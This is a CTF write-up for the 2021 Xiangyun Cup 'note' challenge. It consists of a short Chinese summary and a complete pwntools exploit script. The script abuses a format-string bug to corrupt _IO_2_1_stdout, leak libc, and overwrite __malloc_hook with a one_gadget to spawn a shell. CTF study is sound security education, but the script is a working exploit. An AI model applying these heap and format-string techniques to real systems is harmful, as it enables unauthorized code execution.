祥云杯2021 note wp

格式化字符串任意写，打 _IO_2_1_stdout 泄露 libc；
然后再次利用格式化字符串打 realloc 调栈，执行 one_gadget
exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])


io=remote("node4.anna.nssctf.cn",28168)
# io=process("./note")
elf=ELF("./note")
libc=ELF("./libc-2.23.so")

def add(s, cc):
    """Menu option 1: allocate a note of size ``s`` and fill it with ``cc``.

    ``s`` is passed through str() before sending; ``cc`` is sent as-is with
    no trailing newline.
    """
    choice, size = b"1", str(s)
    io.sendlineafter(b"choice: ", choice)
    io.sendlineafter(b"size: ", size)
    # content is sent raw — the binary's read does not wait for a newline here
    io.sendafter(b"content: ", cc)
    
def fmt(t, cc):
    """Menu option 2: send ``t`` to the "say ?" prompt, then ``cc`` to the next "?" prompt.

    ``t`` is sent raw (no newline); ``cc`` is line-terminated.
    """
    choice = b"2"
    io.sendlineafter(b"choice: ", choice)
    io.sendafter(b"say ? ", t)
    io.sendlineafter(b"? ", cc)
    
def show():
    """Menu option 3 (defined for completeness; not called in this script)."""
    choice = b"3"
    io.sendlineafter(b"choice: ", choice)


# gdb.attach(io)
# pause()

# Step 1 — leak a libc address.  Per the summary at the top of the file, the
# first format-string call writes these four qwords into _IO_2_1_stdout and the
# "%7$s" read-back returns a libc pointer.  The last 6 bytes up to the first
# 0x7f are taken as the address; 0x1430 is the distance from that pointer to
# __malloc_hook for this libc build (libc-2.23.so) — NOTE(review): offset is
# build-specific, re-derive it for any other libc.
payload=p64(0xfbad1887)+p64(0)*3
fmt(b"%7$saaaa",payload)
# recvuntil(b"\x7f") stops at the first 0x7f byte in the stream; if earlier
# output happened to contain one the leak would be wrong — TODO confirm with a
# debug-level run.
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))+0x1430-libc.sym[b"__malloc_hook"]
print("leak_addr: "+hex(leak_addr))  # despite the name this is the libc base, not the raw leak

# libc symbols rebased on the leak.
malloc_hook=leak_addr+libc.sym[b"__malloc_hook"]
free_hook=leak_addr+libc.sym[b"__free_hook"]   # computed but not used below
realloc=leak_addr+libc.sym[b"__libc_realloc"]
# one_gadget offsets for libc-2.23.so; their constraints are listed in the
# comments at the end of the file.  Index 1 (0x4527a) is the one used here.
one_gadget=[0x45226, 0x4527a, 0xf03a4, 0xf1247]
shell=leak_addr+one_gadget[1]

# add(0x90,b"aaa")
# fmt %7$s

# Step 2 — second format-string write, targeted at malloc_hook-0x8: two
# consecutive qwords, `shell` then `realloc+0xc`.  The summary describes this
# as going through realloc to adjust the stack before the one_gadget runs.
payload=p64(shell)+p64(realloc+0xc)
fmt(b"%7$saaaa"+p64(malloc_hook-0x8),payload)

# Trigger: menu option 1 with size 1 (same as add(1, ...) without the content
# step); presumably the allocation invokes the overwritten hook.
# add(0x18,b"1")
io.sendlineafter(b"choice: ",b"1")
io.sendlineafter(b"size: ",b"1")

io.interactive()

# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL